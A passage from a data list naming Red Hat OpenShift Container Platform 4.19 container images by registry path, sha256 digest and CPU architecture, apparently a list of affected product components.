"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:1fbb335fd71191a6096d16c4769716255b833d9fbbfa60d4f12dc014e5d24da2_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:b8a54951f2fb26aa2b0cc93634a7147e4f2fa68a6986c527c5fda7ced2007e90_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-livenessprobe-rhel9@sha256:be5b247472e8155811e40b74a539d15d649c6175e469184aae7cc7a3ae435563_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:0f01b3199d4bbd7d691bd416ce41adb2123807534c965355e03ae0469425eb89_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:387d9d633840c30c52695f776e48e80031e110b05c9ef082597a5cdbf9f5eea2_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:68f71f58e04099967346c0fae031fde60887bbb7dd1041c4d83a0b98455dabd1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-node-driver-registrar-rhel9@sha256:df471031bae8d15bb58bc650ab6d4b9f4fa3f0483cb65838ad147594ec9f33af_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:07dfb0c56f132cd5acf76e5879f521be9abdcf5dc4e2fc663e89739f5e0d5538_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:8f02237f34890ade5878008f0c923597951019454ac5353a63c6616dd33f8f2d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:9979f3eec067571040422a0ad1b96b993a415bf2743960292df2a95b279ca695_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-csi-snapshot-controller-rhel9@sha256:b46b98d3ad75e63e9be7b603a77e27075653ec3afb7e8689fdd182cf40abd3f8_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:3582bf5119513e9d51d83e2d1b3f70a955d2a0675e0b120ba7f6394e94b94e03_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:6b0e909a37e06abaa39c795be926d2da861b9f00fd4c0be18fe7890d825cb6ed_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:ab94610c1dd35f92ad186846735758cf5a301d9bc4e883b2692011988edb4fd3_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-deployer-rhel9@sha256:cf8b7ce2d36bccb2bcbee8bfd0de6bdae5dc40b0199059b2759d0aba56151baa_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:510a2039d88a9f1ae59848d4f6589b7585f002c68f0da8f8a970685d7fb40a5e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6db47ba74f791eb39da7af1862d8978da61cbfd88219441950861ef469cbe472_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:6ec129d640af33af43d698593ae543d22394d0b7bb19b2fd89dfd257e5629ba3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-builder-rhel9@sha256:f09043d293b8948f83da5b5722a0edb74ae3f54b58eeea19c490c0112bad2071_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:802e9ee888afb88e576fee42f11c7ee0d6fcbfb7b5213df16cac12c2b75a1d7c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:8cc4458a66fce822d175559277398c7aef9ddb383399efaf80650c2f350505fd_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:bfbaa99fb697f2a352b97de52a35729481556ac4ad3efadf6b796356a2830fd3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-docker-registry-rhel9@sha256:c1de6ec5108a02b21c15f44308fc3a9b4293f94353c0f25f11576a74fb21ce5d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:622a5b555fb855d565a2c66137c248a239a364c00671d271782695d144d8a56d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:640febb01fbe420ea03dcf3cc19bb8d0c9cf26c4af953133d51347baef830441_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:ce22905d9a22de00509343c81f9400e436132912a9ae6ddf675c0928f3ea4d27_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-etcd-rhel9@sha256:d07ec10275070567596dfccce0a09bd2fbed9d5d452a813f26b1aa3d313b9d71_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:7ecb1d8a291da4a5113355fb9cd53efbe82879d419678800984d8d2b0b1e2b60_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:aa490b00e5c8c799fed61101cdcb32447eab6caf4c4c1037f1a7f9b5ee5c2500_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cloud-controller-manager-rhel9@sha256:ac962f2ec19c1cf0922a5af1d60c6535da0d2bb2e3b1f2bf60f559e7c91fa659_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:211d64fbaf9ecb4d767c4fddea4eadf048ff3783ab8aa28bde76844eaa735361_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:c373f479b51f2bd757cac4f24479cb9056d7745d588cd3a563c364dd63a55d88_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-cluster-api-controllers-rhel9@sha256:fadf5aa90de3fda8b5253c6338406a0eb64866e3f3aab1bfc5f5c0713f3c4277_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:b8604b708e45c6b23f0f82a5dca52077d30819e646da9d45cf7f93bcbf58f3ce_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:e089a7b006efdb5583e05d087a02e0e0416577e913e3d5c6f4cff6918d564436_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-operator-rhel9@sha256:eb327d173c6e77b0c6a60c3774ba0246ce5e2df01639e7bbb59952e9b92e65f6_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:7cf202edc41319fe4b36e57b8663292e9cd6a04c632237a5184a0b441dfcf761_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b3cb2b6d300c2b2d579c7f8c7f66b52fbc891717e29d7b85c204b518093f529f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-pd-csi-driver-rhel9@sha256:b9332849e3b7652afc5dcad447cabeeb884066723a3b174c43fdd39d5651c67e_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:50f27ddd76331df3b0b34c55391976f546f664f0d7a34130fc57c0d8ba9ee75f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:5ff71a6725a51510527d6497b921474a5e735dd4cb53b984ed8af54595b1cd1a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:70b4576443acce236a5bc1244d7bb7ccd11c22b307e8d302fd0038dfc61efa73_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-gcp-workload-identity-federation-webhook-rhel9@sha256:c948760bcc0d498230283dc4126370ac9e98eb1d0bdceccdc0a5f20f8b851b9c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:596d00eb17bd6f00e2b26605db7a54bf04425c6a8a188f5a373643530a4c79ca_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:c3fddc9f6c1e96c29dc018fb30d9f70814390cc4b111089264d4cc82378da5ad_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:dae117e1d6954cb63417510332fc70b5bafb19e0cc618fc103ef4b6581ecbfdb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-haproxy-router-rhel9@sha256:fb23578b8ce937223392967c69b130551572dfab261815242d42ab090f999853_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:720cd3b89d18772d0230731f18dadae46bdb48b4b83d4c3c2afee787eb966f49_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:b207edd030f98804d2dd7a7055b5bb5bfa5008c3c6753ecaffb7fbc0bf18d56a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:e3a086f93b62590794af9f69fc273b3125fd88184e8467b3531d02521282ca06_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hyperkube-rhel9@sha256:fb2ea87732bd32c58d57656d38d3393bc7c48bb6edc41bc23464dc25ec2c72b7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:1a62f6e266959b7ac07e5b79dfec40cd78be425a6b394b8201857632067db88d_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:42e9b35962e1716efd05d11f66862be9711397b87be5c16de41ca67e4fb123db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:9549947e4c8b0005815e651ebc1cbde8adeed54d89ace772f7c87210624cf587_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-hypershift-rhel9@sha256:e6ef275bd908e468f74c371734c00cc8e34fda230407b11caca2ca0e4a8cb98a_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:a02dab2c1d82d33beb22f0d834e89ee5d9d000717c5c9773a86315446222e3d5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-cloud-controller-manager-rhel9@sha256:b692a262776393fe214b1f5e16690098f0ba9c52da91ef168d67915bd4d915b6_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:0eec1806c1aebb18c929da840845a8acff65ddc2066d343f2d02b3dd080954e1_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9-operator@sha256:d82c48027fa2cc1aa104eaca2dfc6c556316cbf6a1bd6b0cacfb5ce8f010c028_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:36145ed08ac5a3071011ff44e0411e3ded8d3483cf59d296c4795043f13f8e10_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibm-vpc-block-csi-driver-rhel9@sha256:6b27224dacb73ea14d2d561add8d93b960a69b602233731b29b134ad732de8d6_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:5dd61548a039d382bb8e0af3e31dfff8d6ec4c5edfccff587c94ece6e8b53281_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:e0ca3155faa73128c74048ce8082773be395f0072b87d01b9f4cd973f48d5486_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-cluster-api-controllers-rhel9@sha256:fd6b29e7ed8f0d58789237c6cb855980611e3d03bcd0628ba4ba8e6beff4c155_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:8d950f862e7b1c75962ed4357e08b0b071f606dc9fa797e10708cbd69dccc705_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ibmcloud-machine-controllers-rhel9@sha256:bf3fa8833ab188a275570bc9f3e58dc4f174015221c3d7aa388468b38b2aec5c_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:173bbd5617f3d72c0b111b073dfba182a6e13562cc205ac707610e4bc99c1b24_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-image-customization-controller-rhel9@sha256:4efe2d4316675a37da7f0536a891bcf2e4aeadf52bdc4678e6946f8884d3b4fe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:0745552aff8b52b7c604cb52765a1aa4ac038b856cf0ceaa61db217515dc9337_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:b88a20e45675d4a9a238d64cb0b6dacc162b4ec207251e5ae7c68303644ac306_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:c5227faf255e647c6444c423132e4de3562ac3279a17a2665be03d4e6bba9750_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-insights-rhel9-operator@sha256:ed35e169497b1564059e5bffeba1da87648ce27b7f6a09474d25a19bd22cf9bf_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:084a30f22516957c012928dcca3c9729cdb9e6199039e758c9d468cd22c1244a_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:60bf3d574a9289b95a0d999a8e653df107ee3fa888bf367436aee7417ceaf3c4_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:9dd7dfbd3499b485fd5765aba6384127c2777796ec50b182fc7ef63303835bc0_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-artifacts-rhel9@sha256:a3169dfd6918dd2108992611cdd3f14525e9f5e5d05cbd174007373ca3442c5c_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:10bda9f9f7f635c444b59e1d0db17776fe52ce9a3e39aba1d0ad339cde9dfcd3_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:21db43c73f7fe5af15ce187586dee84e949ea0a8a3f10fb2da428b3806b3c686_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:723e5bc45bbcfcd5d3ae97339bba491d383876c094f17f8300be5ed6fdc9591f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-installer-rhel9@sha256:f54ba33d1bcd4d7053ee4baf0d16a2b5af52f0e5a123f6c3bd0976ddacd027a4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:3e31d1ece33dffbe5b4d54b888a2d16fe2137f6f35c99a7e5122ff8e0125250d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-agent-rhel9@sha256:dd33a77af11d0f36915205c343eff9bfa86a9a774d82796e6e1f0d8bf454defd_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:47995224ef8ebb0c96f589b4e65d0303ec25cdf337f1593443e5558f58820748_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-machine-os-downloader-rhel9@sha256:e33a0af2825ccfcd6d29470feabfd1710adda01a7a189957f04cc76d02e504db_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:46ce51221a7b62f026ea8958b2e70a4956e48dfffe46196941a232a0a0374e9c_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-rhel9@sha256:f5f3cef14751cc722c6d793f20f2f29e51dcb50eb0a27f182e1cb5cef0a169db_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:02b842b08e52152114669293b4e74a0be77c6b142157787d0a394830ea71f376_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-ironic-static-ip-manager-rhel9@sha256:f2487a02cdd1eef6fb3b9462a39768a8f51110bf9321bc7229898a0c7d7dec4a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:2f381d5e585969b0ec3585d0b3ad338dd8067af067835993832abd50b9094957_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:bf2079d194c311cb1d41b1004f20753190145015c5dd9cdf124c46f62b9e4a15_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:dda8095185ee7997bb9a804fe5a2ebf519e5a5cf53a70439ff2771d21bc24f41_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-keepalived-ipfailover-rhel9@sha256:f51f73917d40e7fc6eab7e9700eb2c253f16c62173d103eb6b38daba651e17cf_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:4b6046eefed5840fa2ded2d2164a088ed3cfd22b50c2c05ebafd92a3190e1854_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:b71de8c64a624d154400844e3f95992e3c5c4090adeecb5158404a6b4cac6be5_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:c471af7de03ccb0fd093a774ee727a3d7712fc073773ad6e0180004d3d1f8fba_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-proxy-rhel9@sha256:dbfe8e54acdfbfc04d1014cae94d227bd45e92d127139a615312e1012485dfa7_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:3509c3e8eaea4bd214c01ad94d9f9f7ce342103e2cecbc1badacfe4b968946e5_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:b06062b58d2db8dae5dfdf6cb413858d5c79f7935d59c1d2397c81d40e377d88_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:dae79f64ec77c8deccdad3c4b451940387d8a081e5cdec911c43c5d475b32256_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-rbac-proxy-rhel9@sha256:fdae399bd29a16232ccaf26fb70b74685c899c0a2ee12910b71a8ae3fcf268ef_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:6267c3fdcdc21c0af4b42a9aa609f164956f0e996162bc87d7466453aa2aad35_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:85a45cc6d79a04a9175d26598325f0a4a1dd3fc279c99aeabe1a6293acc97506_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:aff5468f2fbe57381b15f3e7ca5bcc6b970d554ba239704ec256252b4eddf141_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-state-metrics-rhel9@sha256:c0479910cf5b778058431462c989f6a84d45b12b90f7b8d5e6d041b685e15805_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:0360e8bd3841088dbaca2ec4d960f77f11c70d54d6e5d3b7ce003307b5d04ff8_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:358e506102e7de0a527fd5cb78018395b6fa93683b556e4b3549879e3849291d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:6931003b4a38864328a012655388fcf8475e79ef4f5d97cda18924571df436a6_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kube-storage-version-migrator-rhel9@sha256:b77f9bbb2cff61a07a2a3ef19b3b06245a1aef3537c1bae47a349906983865ea_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:17794053b3ede5275c7115f7d33a3402dcfb0328ffe1a5df86b296ed9e7e0e9d_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:3062abd2eeed1e94d36b2ef11f78c951e56d14792f06c73b0de554522591f506_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:6dbd254f4edee48593ff7e3e58a201cd02ee9cf9cb3cfb007c409b7bfa34137a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-kubevirt-cloud-controller-manager-rhel9@sha256:805c6881556aebde1af449f5fd8c2fd61e02a8e661890a13c17860c618953abe_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:7a4ce4e7146c846b4450f0f027dd07d3f5e32d40b3bc7e167032eef302c618f5_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:aa4406e97de26cacc019d382930ff3f749893d8a79d7e5d03ce5f37ce265e7fe_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:b9e9fa1e81c89ac933903ab395e215ddb0b0850973d3789d7e969512789906ca_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-libvirt-machine-controllers-rhel9@sha256:ddb230986001dba038e11d3f59a650b25721a7e3e2ee15319e5aef8d3e46782a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:60c3470aba8dac67522d1ddb34e57289dce5a2974d65e0cb34a13931e6d5976b_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-aws-rhel9@sha256:6bc5ed044cf1d286364f620c26a428842b3b17010574a5b937bb7095181aa8d4_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:0cfb374c9ae690b499b72fa43e985c6593bb8a461464f57b014f22f1774059b0_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-azure-rhel9@sha256:4afa5a31ec371dc1cff20d2d3547d15e39b7eda901b96d4b95024b9b5e1e8d13_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:59413cffc1a85c76b6e161666f8c06dc6525092466130520d0002547ba824df3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:863b30b65dfedac6d384bf7c0b69670777452f6e19a4ef3a0fe9902cd4b08bf2_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-gcp-rhel9@sha256:eb58e580aac2f881aef5e6de30c588ea8efbc35edd33736a8830a1442e1878e7_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:486e3158229579453dafa3438862a2000603dc40d8e92edb8fe59734244ad786_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:5cfb798541e25e1bb1592f157222a40b31b680a85336bab0c88af98606313a46_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:81bf0b5564a44be0cee22fce23cf7237fc2db06ad8c67bc81673d9bdc8f82a18_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-provider-openstack-rhel9@sha256:eca21187e941910b53c4a325413f455e73aa2954f9e286232326ba8c71c0154a_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:042bf2a1e502809836efca400fc7d7b9e781697611b59cbfd34874a909019518_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:1e7d336b0b1ab6e865635976d2b704debfd8b2ee3370d869d614c7c99b7e2113_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:448aa273da6d50833fa4485fa39bd2ae0248ade7d7e6ace95dbccac96e62ffe3_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-api-rhel9-operator@sha256:7bf94fbd24315a72727f2957d2b106fdbfe6c2d6129f38c3ef4d8d174a298f51_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:4b36552929bc8cfe57e8d24d48aea83515351b5b1339a3c43ff8ced0a1bf1d4f_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:542fd2652f1cd2f47478979e1ba39295889a54cc28e6f6a642554ad4c5cc93cb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:f7ed54888aa22a6c19700077522c97adf372f38cf4350a009e644590182fb3cb_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-config-rhel9-operator@sha256:faf9e3ec97eb13e2bd96d2c5ffb80ffd09486f67fd1c0d14a605438a8d24b95e_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:20b9ee6a4f6c462c2b53a6d449ed18c20a9f3917f94f08548a451e83e6f4a1c9_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:32bcdfbd738620ad414cad2ebb45abd3beeae96c7ae6f06c403441d22ecc4abb_s390x",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:a10d9edf5c9ae4f1840c8f122665f2cc83a4e01c23be42a48509c3416dec2f2a_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-machine-os-images-rhel9@sha256:dae201a6d76006d1f2b9933f9672cb21affd0af056dc99bc2143ecabeeeac8ee_arm64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:03d3c5b12eb66d08cacf9800def4bc0a0ca2561b8725fa897e943345e4bd441f_amd64",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:210a2e800a6a8e3e7f577e3e8b62841d9c4fbf644d44fd927f66fee17709defc_ppc64le",
"Red Hat OpenShift Container Platform 4.19:registry.redhat.io/openshift4/ose-monitoring-plugin-rhel9@sha256:85748fc89666992382ee0059ff56f2ad103a2f066d2e84e270b8dd00fa699c45_s390x",
